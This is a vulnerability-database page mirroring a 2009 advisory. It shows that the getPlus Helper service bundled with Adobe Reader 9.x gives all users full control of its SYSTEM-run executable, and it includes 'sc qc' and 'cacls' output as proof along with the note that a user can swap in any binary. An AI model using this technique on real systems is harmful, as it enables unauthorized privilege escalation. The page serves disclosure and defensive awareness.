Vulners
Lucene search
Adobe 9.x Related Service - 'getPlus_HelperSvc.exe' Local Privilege Escalation
🗓️ 20 Jul 2009 00:00:00Reported by Nine:Situations:GroupType 
exploitdb🔗 www.exploit-db.com👁 39 Views
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
by Nine:Situations:Group
site: http://retrogod.altervista.org/
description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x
vendor: Nos Microsystems
poc:
C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: getPlus(R) Helper
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : getPlus(R) Helper
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
NT AUTHORITY\SYSTEM:F
The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.
# milw0rm.com [2009-07-20]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jul 2009 00:00Current
7.4High risk
Vulners AI Score7.4